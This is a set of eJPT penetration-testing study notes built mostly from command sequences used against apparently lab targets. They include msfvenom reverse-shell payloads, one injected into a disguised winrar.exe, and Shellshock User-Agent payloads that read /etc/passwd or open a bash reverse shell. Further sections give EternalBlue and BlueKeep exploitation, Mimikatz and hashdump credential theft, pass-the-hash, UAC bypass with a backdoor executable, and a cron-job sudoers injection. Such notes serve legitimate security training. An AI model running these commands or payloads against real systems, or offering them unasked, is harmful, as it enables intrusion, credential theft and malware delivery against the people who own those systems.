EJPT Notes

Assessment Methodologies

Passive Information Gathering

Website Recon & Footprinting

• IP Addresses
  • host <domain>
• Directories
  • robots.txt
  • sitemap.xml
• Names
• Emails
• Phone Numbers
• Physical Addresses
• Web Technologies Used
  • BuiltWith → Firefox Addon (Recommended)
  • Wappalyzer → Extension
  • whatweb <domain> → Linux Tool
  • webhttrack → Website Copier

Whois Enumeration

• https://who.is website
• whois <domain>

Website Footprinting with Netcraft

• https://netcraft.com

DNS Recon

• dnsrecon -d <domain> → Kali Linux Tool
• https://dnsdumpster.com/

WAF

• wafw00f

Subdomain Enumeration

• Sublist3r

Google Dorks

• cache:ine.com
• Exploit-DB Dorks

Email Harvesting

• theHarvester

Leaked Password Databases

• HaveIBeenPwned?

Active Information Gathering

DNS Zone Transfer

• /etc/hosts → Local DNS
• dnsenum
• dig
• fierce
• nmap
• netdiscover

Footprinting & Scanning

Active Information Gathering

Host Discovery Techniques

• Ping Sweeps → ICMP Echo Requests → Tool: fping
  • fping -a -g 10.10.23.0/24
• ARP Scanning
• TCP SYN Ping → Half-Open Scan
• UDP Ping
• TCP ACK Ping
• SYN-ACK Ping → Sends SYN-ACK packets

NMAP

• Scripts → /usr/share/nmap/scripts/
• Firewall/IDS Evasion
  • -f → Fragments IP packets
  • -D → Decoy
• -Pn vs -sn
  • -sn → tells Nmap not to scan any ports → forcing it to rely primarily on ICMP echo packets →  to identify targets
  • -Pn
• Types of Scans:
  • TCP Connect Scans (-sT)
  • SYN “Half-open” Scans (-sS)
  • UDP Scans (-sU)
  • TCP Null Scans (-sN) → sent with no flags set at all
    • As per the RFC, the target host should respond with a RST if the port is closed.
  • TCP FIN Scans (-sF) → a request is sent with the FIN flag (usually used to gracefully close an active connection)
    • Nmap expects a RST if the port is closed.
  • TCP Xmas Scans (-sX) → send a malformed TCP packet and expects a RST response for closed ports.
• If a UDP port doesn’t respond to an Nmap scan, it will be marked as open|filtered
• NULL, FIN and Xmas → Firewall Evasion
• Microsoft Windows → may respond to a NULL, FIN or Xmas scan with a RST for every port
• Zenmap:
  • Green → Machine is alive
  • Red → Machine is alive but not responding or not directly accessible
  • Yellow → We have launched the scan (that is, the attacker machine) and it has plotted the other hosts connection with hostname and IP addresses to localhost.
• nmap -Pn -p 134,177,234 -sUV 192.156.4.3 --script=discovery

FFUF

• You could also use any custom keyword instead of FUZZ, you just need to define it like this wordlist.txt:KEYWORD
  • ffuf -u http://10.10.199.197/NORAJ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt:NORAJ
• generic list of files such as raft-medium-files-lowercase.txt
  • ffuf -u http://10.10.199.197/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt
• To hide the progress: 2>/dev/null
• Directories: ffuf -u http://10.10.199.197/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
• By adding -fc 403 (filter code) we’ll hide from the output all 403 HTTP status codes.
• -mc 200 → Only shows 200
• -fr → Filter regexp

Audit

• https://cisofy.com/lynis/

Penetration Testing

Windows Vulnerabilities

• Windos IIS - Port 80, 443
• WebDAV - Port 80, 443
• SMB/CIFS - Port 445
• RDP - Port 3389
• WinRM - Port 5986/443

Exploit - WebDAV IIS

• nmap -sV -p 80 --script=http-enum <target>
• hydra -L <username-list> -P <password-list> <target> http-get /webdav/
• davtest -auth user:password -url <url>
• cadaver <url> → Enter username & password
  • put <webshell-path>
• Webshells → /usr/share/webshells
• dir C:/ & type C:/<filepath>
• msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=1234 -f asp > shell.asp
• service postgresql start && msfconsole
  • use multi/handler → Use to setup a listener for payload you created with msfvenom
  • set payload windows/meterpreter/reverse_tcp
  • show options
  • set LHOST & LPORT & Run

Exploit - SMB : PSExec

• nmap -sV -sC <target>
• scanner/smb/smb_login
• psexec.py Administrator@192.168.1.1
• Usernames: /usr/share/metasploit/data/wordlists/common_users.txt
• exploit/windows/smb/psexec

Exploit - SMB : Eternal Blue(MS17-010)

• https://github.com/3ndG4me/AutoBlue-MS17-010
• cd Shellcode
• ./shell_prep.sh → Enter Y, Your IP, LPORT, Regular Shell, Stageless
• nc -lvnp 1234
• python eternalblue_exploitX.py <target IP> shellcode/sc_x64.bin
• Method 2 : Metasploit
• use windows/smb/ms17_010_eternalblue

Exploit - RDP

• use auxiliary/scanner/rdp/rdp_scanner → Set RHOST & RPORT → To detect RDP
• hydra -L <username-wordlist> -P <password-wordlist> rdp://<target> -s <PORT>
• xfreerdp /u:<username> /p:<password> /v:<target>:<port>

Exploit - WinRM

• Port → 5985
• crackmapexec winrm <target-ip> -u <username> -p <wordlist-path>
• crackmapexec winrm <target> -u <username> -p <password> -x <command>
• evil-winrm.rb -u <username> -p <password> -i <target>
• use exploit/windows/winrm/winrm_script_exec
  • set FORCE_VBS true
  • set username & password
  • exploit

> use auxiliary/scanner/winrm/winrm_auth_methods
> use auxiliary/scanner/winrm/winrm_login
> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
> set VERBOSE false

> use use auxiliary/scanner/winrm/winrm_cmd
> set USERNAME administrator
> set PASSWORD tinkerbell
> set cmd whoami
> run

> use exploit/windows/winrm/winrm_script_exec
> set USERNAME <>
> set PASSWORD <>
> set LHOST <IP>
> set FORCE_VBS true
> run
> sysinfo
copy

Privilege Escalation

Windows

• Windows-Exploit-Suggester - https://github.com/AonCyberLabs/Windows-Exploit-Suggester
  • Copy sysinfo to a txt file
  • ./windows-exploit-suggester.py --update
  • ./windows-exploit-suggester.py --database <filename.xls> --systeminfo <path-to-txt-file>
• Windows-Kernel-Exploits - https://github.com/SecWiki/windows-kernel-exploits
  • Download the specific exploit
  • Upload this exploit using Meterpreter
  • shell → .\<exploit>.exe
• Meterpreter → getsystem → Escalate Privileges
• use multi/recon/local_exploit_suggester → To find out vulnerable exploits

Exploit - UAC

• UAC → User Access Control → Windows Security Feature → Used to prevent unauthorized changes from being made to the OS
  • It ensures that changes to the IS require approval from admin or a user account that is part of admin group
• https://github.com/hfiref0x/UACME
• net users
• net localgroup administrators
• use exploit/windows/http/rejetoo_hfs_exec
• pgrep explorer → Digit
• migrate <digit> → Change x86 to x64
• msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=1234 -f exe > backdoor.exe
• upload backdoor.exe
• upload /root/Desktop/Tools/UACME/Akagi64.exe
• .\Akagi64.exe 23 C:\Temp\backdoor.exe

Enumeration

Importing Nmap results into MSF

service postgresql start
msfconsole

msf> db_status 
msf> workspace
msf> workspace -a <name> // Create a new workspace
msf> db_import <path_to_file>
msf> hosts // Check whether the data imported successfully
msf> services // Check whether the data imported successfully
msf> db_nmap -Pn -sV -o 10.4.22.173 // Results will be saved in MSF DB
copy

Port Scanning with Auxiliary Modules

service postgresql start
msfconsole

msf> workspace -a portscan
msf> search portscan
msf> use <module_name> / <index> // scanner/portscan/tcp
msf> show options
msf> set RHOSTS 192.168.100.43 // TARGET IP
msf> curl <> // If HTTP is open
msf> search xoda
msf> use <index/module_name>
msf> show options
msf> set RHOSTS <TARGET IP>
msf> set TARGETURI / -> // Set the path where service is hosted
msf> exploit // It will give meterpreter session

mp> sysinfo // Target Infomation
mp> shell // Open shell session

bash> ifconfig // Identify next target address (x.x.x.x+1)
bash> exit // CTRL + C

mp> run autoroute -s <IP> // IP of one of the machine in subnet -> Add route
mp> background // Will take this session in Background

msf> sessions // View current sessions
msf> search portscan
msf> set RHOSTS <TARGET_2> // Target 1+1 (x.x.x.x+1)
msf> run 
msf> back
msf> search udp_sweep 


ERROR:
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
SOLUTION:
SET LHOST <BASE_MACHINE_IP> // Attacker IP
copy

FTP Enumeration

msf> search type:auxiliary name:ftp
msf> use auxiliary/scanner/ftp/ftp_version
msf> use auxiliary/scanner/ftp/ftp_login
msf> set RHOSTS <IP>
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf> run

msf> use auxiliary/scanner/ftp/anonymous
copy

SMB Enumeration

msf> setg RHOSTS <IP>  // Setting a Global variable
msf> search type:auxiliary name:smb
msf> use auxiliary/scanner/smb/smb_version
msf> use auxiliary/scanner/smb/smb_enumusers
msf> info // See info about module
msf> use auxiliary/scanner/smb/smb_enumshares
msf> set ShowFiles true
msf> use auxiliary/scanner/smb/smb_login
msf> set SMB_USER admin
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

bash> smbclient -L \\\\<IP>\\ -U admin   // -L: List all shares
bash> smbclient \\\\<IP>\\<share> -U admin // Replace share name
copy

Web Server Enumeration

msf> setg RHOSTS <IP>
msf> setg RHOST <IP>
msf> search type:auxiliary name:http
msf> use auxiliary/scanner/http/http_version
msf> use auxiliary/scanner/http/http_header
msf> use auxiliary/scanner/http/robots_txt
msf> use auxiliary/scanner/http/dir_scanner
msf> use auxiliary/scanner/http/files_dir
msf> use auxiliary/scanner/http/http_login
msf> set AUTH_URI <dir> // Replace dir that you want to bruteforce credentials
msf> unset USERPASS_FILE
msf> run 
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/namelist.txt
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf> set VERBOSE false
msf> run
msf> use auxiliary/scanner/http/apache_userdir_enum
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf> echo "<username>" > user.txt
msf> use auxiliary/scanner/http/http_login
msf> set USER_FILE /root/user.txt
copy

MySQL Enumeration

// MySQL - TCP Port 3306

msf> use auxiliary/scanner/mysql/mysql_version
msf> use use auxiliary/scanner/mysql/mysql_login
msf> set USERNAME root
msf> set PASSFILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf> set VERBOSE false
msf> run // It will bruteforce passwords

// auxiliary/admin/ -> This admin modules requires credentials

msf> use auxiliary/admin/mysql/mysql_enum
msf> set PASSWORD <password> // This module requires creds
msf> set USERNAME root
msf> run
msf> use auxiliary/admin/mysql/mysql_sql
msf> set USERNAME root
msf> set PASSWORD <password>
msf> set SQL show databases;
msf> use auxiliary/scanner/mysql/mysql_schemadump
msf> set USERNAME root
msf> set PASSWORD <password>

bash> mysql -h <IP> -u root -p
copy

SSH Enumeration

msf> search type:auxiliary name:ssh
msf> use auxiliary/scanner/ssh/ssh_version
msf> use auxiliary/scanner/ssh/ssh_login // Password Auth
msf> use auxiliary/scanner/ssh/ssh_version_pubkey // Key-Pair Auth
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
msf> sessions <number>
msf> /bin/bash -i 
bash> ls

msf> use auxiliary/scanner/ssh/ssh_enumusers
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
copy

SMTP Enumeration

msf> search type:auxiliary name:smtp
msf> use auxiliary/scanner/smtp/smtp_version
msf> use auxiliary/scanner/smtp/smtp_enum
copy

Vulnerability Assessment

Frequently Exploited Windows Services

• Microsoft IIS → Port 80/443 → Web Server
• WebDAV → Port 80/443 → HTTP Extension that allows clients to update, delete, move & copy files on web server
• SMB/CIFS → Port 445 → Network File Sharing Protocol
• RDP → Port 3389 → Remotely authenticate & interact with Windows system
• WinRM → Port 5986/443 → Windows remote management protocol

MSF Vulnerability Scanning

bash> searchsploit "Microsoft Windows SMB"
bash> searchsploit "Microsoft Windows SMB" | grep -e "Metasploit"
copy

• metasploit-autopwn

> wget https://github.com/hahwul/metasploit-autopwn/blob/09320cc637bf363a79a565e4ff3a58a50020ac6f/db_autopwn.rb
> mv db_autopwn.db /usr/share/metasploit-framework/
> load db_autopwn (msf)
> db_autopwn -p -t
> db_autopwn -p -t -PI 445
> analyze 
copy

MS17-010 SMB Vulnerability (EternalBlue Exploit)

• EternalBlue → Collection of Windows Vulnerabilities & exploits that allow attackers to remotely execute arbitrary code & gain access to a Windows System
• Affected Versions
  • Vista, 7, Server 2008, 8.1, Server 2012, Windows 10, Windows Server 2016

> nmap -sV -p 445 -O <IP>
> nmap -sV -p 445 --script=smb-vuln-ms17-010 <IP>
> git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
> cd <DIR>
> pip install -r requirement.txt
> cd shellcode && chmod +x shell_prep.sh
> ./shell_prep.sh // 1. Type Y 2. Enter LHOST IP 3. Enter LHOST port 4. Type 1(Regular CMD Shell) 5. Type 1 (Stageless payload) -> sc_x86.bin / sc_x64.bin
> cd ..
> chmod +x eternalblue_exploit7.py
> nc -nvlp 1234
> python eternalblue_exploit7.py <IP> shellcode/sc_x64.bin

// Method 2
msf> search eternalblue
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS <IP>
copy

BlueKeep (Windows CVE-2019-0708 RDP Vulnerability)

• Allow attackers to remotely execute arbitrary code & gain access to a Windows system & consequently the network that the target system is part of

> sudo nmap -p <IP>

msf> search BlueKeep
msf> use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf> set RHOSTS <IP>
msf> run
msf> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf> set RHOSTS 
msf> exlpoit
copy

PassTheHash Attack

msf> service postgresql start && msfconsole
msf> search badblue
msf> use exploit/windows/http/badblue_passthru
msf> set RHOSTS <IP>
msf> exploit

mp> pgrep lsass
mp> migrate 780
mp> getuid
mp> load kiwi
mp> lsa_dump_sam // Administrative NTLM Creds

msf> use exploit/windows/smb/psexec
msf> set LPORT <PORT>
msf> set RHOSTS <IP>
msf> set SMBUser Administrator
msf> set SMBPass <LMHash>:<NTLM Hash>
msf> set target Native\ upload
msf> exploit

// Method 2
> crackmapexec smb <IP> -u Administrator -H <NTLM Hash>
> crackmapexec smb <IP> -u Administrator -H <NTLM Hash> -x "ipconfig"
copy

Shellshock (Bash CVE-2014-6271 Vulnerability)

• Allows an attacker to execute remote arbitrary commands via Bash, consequently allowing the attacker to obtain remote access to the target system via a reverse shell.

> nmap -sV <IP>
> nmap -sV <IP> --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi"
> 
> Capture this request in Burp
> User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'

> nc -nvlp 1234
> User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/192.24.241.2/1234 0>&1'

msf> search shellshock
msf> use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf> set RHOSTS <IP>
msf> set TARGETURI /gettime.cgi
msf> exploit
copy

Vulnerability Scanning

Nessus

sudo dpkg -i Nessus.deb // Download from Nessus Website
sudo systemctl start nessusd.service
copy

WMAP

msf> setg RHOSTS <IP>
msf> load wmap
msf> wmap_sites -a <IP>
msf> wmap_targets -t http://<IP>
msf> wmap_sites -l
msf> wmap_targets -l
msf> wmap_run -t 
msf> 
copy

Windows Privilege Escalation

Windows Kernel Exploits

• Windows-Exploit-Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
• windows-kernel-exploits: https://github.com/SecWiki/windows-kernel-exploits

msf> getsystem // command to run privilege escalation
msf> use post/multi/recon/local_exploit_suggester
msf> set SESSION <Number>
msf> run
copy

Bypassing User Account Control (UAC)

• In order to bypass UAC, you need to have access to a user account that is a part of the local administrative group on the Windows target system.
• UACMe: https://github.com/hfiref0x/UACME

> net users
> net localgroup administrators
> setg RHOSTS <IP>
> search rejetto
> run
> sysinfo // 32-bit mp session
> pgrep explorer
> migrate <ID>
> sysinfo // 64-bit mp session
> shell
> net user
> net localgroup administrators
> 

// MSF : UACME
> use multi/handler
> set payload windows/meterpreter/reverse_tcp
> set LHOST <IP>
> set LPORT <Port>
> run

// Create Payload
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f exe 'backdoor.exe'

// Continue Previous Session
> pwd
> getuid
> getprivs
> cd C:\\
> mkdir temp
> cd temp
> upload backdoor.exe
> upload /root/Desktop/tools/UACME/Akagi64.exe
> shell
> dir
> Akagi63.exe 23 C:\\temp\backdoor.exe

It will connect to lister

> getuid
> getprivs
> getsystem
> hashdump
copy

Access Control Impersonation

• Windows Access Tokens: Responsible for identifying & describing the security context of a process or thread running on a system.
• Access tokens are generated by the winlogon.exe process every time a user authenticates successfully & includes the identity & privileges of the user account associated with the thread or process.
• Privileges:
  • SeAssignPrimaryToken: This allows a user to impersonate tokens
  • SeCreateToken: This allows a user to create an arbitrary token with an administrative privileges.
  • SeImpersonatePrivilege: This allows a user to create a process under the security context of another user typically with administrative privileges.

> nmap <IP>
> search rejetto
> set RHOSTS <IP>
> exploit
> sysinfo
> pgrep explorer
> migrate <ID>
> getuid
> getprivs
> use incognito
> list_tokens -u
> impersonate_token <Name>
> getuid
> pgrep explorer
> migrate <ID>
copy

Alternate Data Streams (ADS)

• ADS is an NTFS file attribute & was designed to provide compatibility with the macOS HFS
• Any file created on an NTFS drive will have two different forks/streams:
  • Data Stream → Default stream that contains data of the file
  • Resource Stream → Typically contains metadata of the file
• Attackers can use ADS to hide malicious code or executables in legitimate files in order to evade detection

Unattended Windows Setup

• Config Files:
  • C:\Windows\Panther\Unattend.xml
  • C:\Windows\Panther\Autounattend.xml

> msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=1234 -f exe > payload.exe
> python -m SimpleHTTPServer 80

// Windows
> cd Desktop
> certutil -urlcache -f http://<Kali>/payload.exe payload.exe
> msfconsole
> use multi/handler
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST <IP>
> set LPORT 1234
> run

// Execute the payload in Windows

> search -f unattend.xml
> cd C:\\Windows\\Panther
> download unattend.xml
> vim password.txt
> base64 -d password.txt
> psexec.py Administrator@<IP> // Enter password

// Windows: runas.exe /user:Administrator cmd // Enter password
copy

Dumping Hashes with Mimikatz

• Mimikatz: Windows Post Exploitation tool → Allows for the extraction of clear-text passwords, hashes & Kerberos tickers from memory.

> nmap -sV <IP>
> msfconsole
> search badblue
> use exploit/windows/http/badblue_passthru
> set RHOSTS <IP>
> exploit
> sysinfo
> getuid
> pgrep lsass
> migrate <ID>
> getuid
> load kiwi
> ? // Help Menu
> creds_all // Dump all creds
> lsa_dump_sam
> lsa_dump_secrets
> cd C:\\
> mkdir Temp
> cd Temp
> upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
> shell
> dir
> mimikatz.exe 
> privilege::debug
> lsadump::sam
> lsadump::secrets
> sekurlsa::logonpasswords
copy

Linux Exploits

FTP

> nmap -sV <IP>
> ftp <IP> // Check anonymous login
> hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> -t 4 ftp
> searchsploit proftpd
copy

SSH

> hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> -t 4 ssh
copy

SAMBA

• SAMBA is a Linux implementation of SMB
• SAMBA allows Windows systems to access Linux shares & devices

> nmap -sV <IP>
> hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> smb
> smbmap -H <IP> -u admin -p <password>
> smbclient -L <IP> -U admin 
> smbclient //<IP>/shawn -U admin
> ?
> dir
> smbclient //<IP>/nancy -U admin
> get flag
> ls 
> cat flag
> smbclient //<IP>/admin -U admin
> tar xzf flag.tar.gz
> cat flag
> enum4linux -a <IP>
> enum4linux -a -u admin -p <password> <IP>
copy

Linux Privilege Escalation

Linux Kernel Exploits

• Linux Exploit Suggester: https://github.com/The-Z-Labs/linux-exploit-suggester

> sysinfo
> getuid
> shell
> /bin/bash -i
> cat /etc/passwd
> // Quick Download: Linux Exploit Suggester
> chmod +x les.sh
> ./les.sh
> 
copy

Misconfigured Cron Jobs

• Cron → Time based service that runs applications, scripts & other commands repeatedly on a specific schedule
• In order to elevate our privileges, we will need to find & identify the cron jobs scheduled by the root user or the files being processed by the the cron job

> whoami
> groups <user>
> cat /etc/passwd
> crontab -l // List crontab for current user
> ls -la
> cd /
> grep -rnw /usr -e "/home/student/message"
> cat /tmp/message
> ls -la /usr/local/share/copy.sh
> cat /usr/local/share/copy.sh
> printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh
> sudo su
copy

SUID Binaries

• SUID → Set Owner User ID permission
• This permission provides users with the ability to execute a script or binary with the permissions of the file owner as opposed to the user that is running the script or binary
• SUID permissions are typically used to provide unprivileged users with the ability to run specific scripts or binaries with “root” permissions.
• The provision of elevate privileges is limited to the execution of the script & does not translate to elevation of privileges.

> whoami
> groups <user>
> ls -la
> file welcome
> strings welcome
> rm greetings
> cp /bin/bash greetings
> ./welcome
> cat /etc/shadow
copy

Dumping Linux Password Hashes

• Prefix:
  • $1 → MD5
  • $2 → Blowfish
  • $5 → SHA-256
  • $6 → SHA-512

> nmap -sV <IP>
> searchsploit proftpd
> setg RHOSTS <IP>
> search proftpd
> use exploit/unix/ftp/proftpd_133c_backdoor
> show options
> set payload payload/cmd/unix/reverse
> exploit
> /bin/bash -i
> id
> // Go in background
> sessions
> session -u 1
> sysinfo
> getuid
> cat /etc/shadow

// Get hash
> use post/linux/gather/hashdump
> show options
> set SESSION 2
> run

// Crack hash
> use auxiliary/analyze/crack_linux
> set SHA512 true
> run
copy

Network-Based Attacks

Firewall Detection & IDS Evasion

> nmap -Pn -sS -F <IP> // -F -> Fast Scan
> nmap -Pn -sS -sV -F -f <IP> // -f -> Fragment Packets
copy

SMB & NetBIOS Enumeration

• NetBIOS → API & a set of network protocol providing communication services over a local network. It is used primarily to allow applications on different computers to find & interact with each other on a network
• SMB → A network file sharing protocol that allows computers on a network to share files, printers, & other resources.

> cat /etc/hosts
> ping demo.ine.local // reachable IP1
> ping demo1.ine.local // not reachable IP2
> nmap demo.ine.local
> nbtscan
> whatis nbtscan
> nbtscan <IP/Subnet>
> nbtscan
> nmblookup -A <IP1>
> nmap -sU -p 137 <IP1>
> nmap -sU -sV -p 137 -T4 --script=nbstat.nse -Pn -n <IP1>
> nmap -sV -p 139,445 demo.ine.local
> ls -la /usr/share/nmap/scripts/ | grep -e "smb-*"
> nmap -p445 --script smb-protocols demo.ine.local
> nmap -p445 --script smb-security-mode demo.ine.local
> smbclient -L demo.ine.local // testing for anonymous access -> press enter
> nmap -p445 --script smb-enum-users demo.ine.local
> nano users.txt // enter all usernames
> hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local smb
> psexec.py administrator@demo.ine.local
> whoami


// MSF
> search psexec
> use exploit/windows/smb/psexec
> set SMBUser <username>
> set SMBPass <password>
> set payload windows/x64/meterpreter/reverse_tcp
> exploit
> sysinfo
> shell
> ping <IP2> // Exit
> run autoroute -s <IP2/Subnet> // /20 -> Meterpreter
> background
> seach socks
> use auxiliary/server/socks_proxy 
> set VERSION 4a // cat /etc/proxychains4
> set SRVPORT <ProxychainPort>
> run
> netstat -antp


// Machine 1
> proxychains nmap demo1.ine.local -sT -Pn -sV -p 445

// MSF
> shell 
> net view <IP2>
> background
> migrate -N explorer.exe
> shell
> net view <IP2>
> net use D: \\<IP2>\Documents
> net use K: \\<IP2>\K$
> dir D:
> 
copy

SNMP Enumeration

> cat /etc/hosts
> nmap -sU -sV -p 161 demo.ine.local
> ls -la /usr/share/nmap/scripts | grep -e "snmp-*"
> ls -la /usr/share/nmap/nselib/data/ | grep snmp
> nmap -sU -p 161 --script=snmp-brute demo.ine.local
> snmpwalk -v 1 -c public demo.ine.local
> nmap -sU -p 161 --script=snmp-* demo.ine.local > snmp_results // Enumerate users, etc.
> hydra -l administrator -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> smb 
> 
copy

SMB Relay Attack

• It is type of network attack where an attacker intercepts SMB traffic, manipulates it & relays it to a legitimate server to gain unauthorized access to resources or perform malicious actions

> search smb_relay
> use exploit/windows/smb/smb_relay
> set SRVHOST <IP> // Kali Linux IP - ifconfig
> set LHOST <IP> // Kali Linux IP - ifconfig
> set SMBHOST <IP> // Check lab docs
>

// New Tab
> echo "<Kali-IP> *.sportsfoo" > dns
> dsnspoof -i eth1 -f dns
> 
copy

Metasploit

MSFVenom

• x86 → 32 bit

> msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f exe > payloadx86.exe
> msfvenom -a x64 -p windows/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f exe > payloadx86.exe
> msfvenom --list formats
> msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f elf > payloadx86.elf

// SHELLCODE
// -i -> Iterations
// -e -> Encoding
// -x -> Inject in file
// -k -> Keep original behavior of file (ex. winrar.exe)
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -e x86/shikata_ga_nai -f exe > encodedx86.exe
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe > encodedx86.exe
> msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f elf > encodedx86
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -x ~/Downloads/winrar601.exe > winrar.exe
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -k -x ~/Downloads/winrar601.exe > winrar.exe

// MSF Scripts
> msfconsole -r handler.rc
> 
copy

HTTP File Server (HFS)

> db_nmap -sS -sV -O <IP>
> search type:exploit name:rejetto
> use exploit/windows/http/rejetto_hfs_exec
> set RHOSTS <IP>
> exploit // 32-bit session
> set payload windows/x64/meterpreter/reverse_tcp
> exploit // 64-bit session
copy

Apache Tomcat Java Server

> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> services
> search type:exploit tomcat_jsp
> use exploit/multi/http/tomcat_jsp_upload_bypass
> set payload java/jsp_shell_bind_tcp
> set LHOST & LPORT
> set SHELL cmd
> exploit
> background the session

> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali-IP> LPORT=1234 -f exe> meterpreter.exe 
> sudo python -m SimpleHTTPServer 80

> sessions 1
> certutil -urlcache -f http://<Kali-IP>/meterpreter.exe meterpreter.exe
> dir // Continue

> nano handler.rc
> use multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST <Kali-IP>
> set LPORT 1234
> run
> SAVE THE FILE
> msfconsole -r handler.rc

> .\meterpreter.exe // Resume after running handler.rc

> sysinfo
> getuid
copy

FTP Server

> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> services
> analyze
> search vsftpd
> use exploit/unix/ftp/vsftpd+234_backdoor
> exploit
> background
> sessions
> search shell_to_meterpreter
> use post/multi/manage/shell_to_meterpreter
> set LHOST <kali-ip>
> set LHOST eth1
> set SESSION <ID>
> run
> sessions 2
> sysinfo
copy

SAMBA : File Sharing Service

> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> search type:exploit name:samba
> use exploit/linux/samba/is_known_pipename
> check // check it it's vulnerable
> run
> ls / pwd
> background
> search shell_to_meterpreter
> use post/multi/manage/shell_to_meterpreter
> set LHOST eth1
> set SESSION <ID>
> run
> sessions 2
> sysinfo
copy

SSH

> setg RHSOTS <IP>
> db_nmap -sS -sV -O <IP>
> search libssh_auth_bypass
> use auxiliary/scanner/ssh/libssh_auth_bypass
> set SPAWN_PTY true
> run
> session 1
> > background
> search shell_to_meterpreter
> use post/multi/manage/shell_to_meterpreter
> set LHOST eth1
> set SESSION <ID>
> run
> sessions 2
copy

SMTP

> setg RHSOTS <IP>
> db_nmap -sV -O <IP>
> search type:exploit name:haraka
> use exploit/linux/smtp/haraka
> set SRVPORT 9898
> set email_to root@attackdefense.test
> set payload linux/x64/meterpreter_reverse_http
> set LHOST eth1 
copy

Meterpreter

> edit flag1 // Text Editor
> download flag1 
> checksum md5 /bin/bash
> getenv PATH
> search -d /usr/bin -f *backdoor*
> search -f *.jpg
> search -f *.php
> shell
> ps // Runnning Processes
> migrate <pid>
> session -u 1 // Upgrade shell to Meterpreter session 
copy

Windows Post Exploitation

Modules

> setg RHOSTS <IP>
> db_nmap -sV <IP>
> search rejetto
> use exploit/windows/http/rejetto_hfs_exec
> run
> getsystem // elevate privileges
> getuid
> hashdump
> show_mount
> ps // list process
> migrate <pid>

> search win_privs
> use post/windows/gather/win_privs
> set SESSION <id>
> run
> search enum_logged
> use post/windows/gather/enum_logged_on_users
> set SESSION <id>
> run
> search checkvm
> use post/windows/gather/checkvm
> set SESSION <id>
> run
> search enum_applications
> use post/windows/gather/enum_applications
> set SESSION <id>
> run
> loot // Store results in DB
> use post/windows/gather/windows_av_excluded
> set SESSION 1
> run
> search enum_computer
> use post/windows/gather/enum_computers
> search enum_patches
> use post/windows/gather/enum_patches
> use post/windows/gather/enum_shares
> use post/windows/manage/enable_rdp
> set SESSION <id>
> run
copy

UAC Bypass

> use exploit/windows/http/rejetto_hfs_exec
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST eth1
> exploit
> sysinfo
> getuid
> getsystem
> getprivs
> shell
> net users
> net localgroup administrators
> background
> search bypassuac
> use exploit/windows/local/bypassuac_injection
> set payload windows/x64/meterpreter/reverse_tcp
> set SESSION 1
> set LPORT 1234
> run
> set TARGET Windows\ x64
> run
> getsystem
> hashdump
copy

